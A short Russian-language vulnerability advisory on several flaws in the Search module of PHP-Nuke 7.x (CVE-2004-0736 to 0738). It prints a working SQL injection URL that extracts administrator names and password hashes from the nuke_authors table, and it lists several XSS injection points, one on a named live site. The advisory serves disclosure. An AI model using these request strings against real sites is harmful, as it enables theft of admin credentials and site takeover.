Несколько уязвимостей в PHP-Nuke

Дата публикации:
20.07.2004
Всего просмотров:
2688
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-0736
CVE-2004-0737
CVE-2004-0738
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Nuke 7.x
Уязвимые версии: PHP-Nuke

Описание: Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.

1. SQL инъекция:

http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1
&categ=%2 0and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
2. XSS:
http://localhost/nuke73/modules.php?name=Search&sid=[xss code here]
http://localhost/nuke73/modules.php?name=Search&query=*&max=[xss code here]
http://localhost/nuke73/modules.php?name=Search&query=waraxe&sel1=[xss code here]&type=comments
http://localhost/nuke73/modules.php?name=Search&a=6&query=*&match=[xss code here]
http://www.nukecops.com/modules.php?name=Search&query=*&m od3=[xss code here]

URL производителя: http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3]

или введите имя

CAPTCHA